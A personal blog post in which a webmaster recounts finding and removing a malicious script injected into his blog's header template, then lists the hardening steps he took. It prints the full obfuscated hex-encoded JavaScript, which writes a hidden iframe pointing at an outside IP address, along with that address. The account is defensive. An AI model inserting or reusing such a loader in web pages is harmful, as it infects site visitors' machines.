Peter Vatistas

I really hate when this happens but it does and it is somewhat a regular thing when you manage as many websites as I do. Today I found someone hacked into my blog (this one) and added a bullshit script to my header template.

I am not sure exactly what this script does since I use Linux and Firefox 2 but when I checked out my site on my wife’s computer (Microsoft Windows Vista & IE7) a ton of crap started happening. My web browser froze, my anti-virus was alerting me of potential viruses, and a bunch of Windows errors popped up including the BSOD (isn’t blue screens a thing of the past? LOL).

Anyways I took several steps to ensure whatever or whoever got in was blocked; I notified my host to block the IP receiving whatever information from that bullshit script. Here is what I found:

<script> var s=’3C696672616D65207372633D22687474703A2F2F31
39352E352E3131362E3235302F65782F7374617469632E706870222077
696474683D32206865696768743D32207374796C653D22646973706C61
793A6E6F6E65223E3C2F696672616D653E’; var o=”; for(i=0;i<s
.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.
substr(i,2);} document.write(unescape(o)); </script>

The IP address is: 195.5.116.250

After catching this I quickly changed my server passwords, verified that ftp was disabled and the ports were closed (along with all other unused ports), and chmod 755 (instead of 777) the world-writable and uploads directories. After I removed the script from the header I also did a full blown search on every template file. Problem solved.

These kind of things always happen and my advice is to always check html for any changes. It is also very important to change your passwords regularly and keep your ftp ports CLOSED, only use SSH or SFTP if you can. I also have added checking file permissions to my security checklist, every week or so I plan to run through my web files and verify no changes have been made.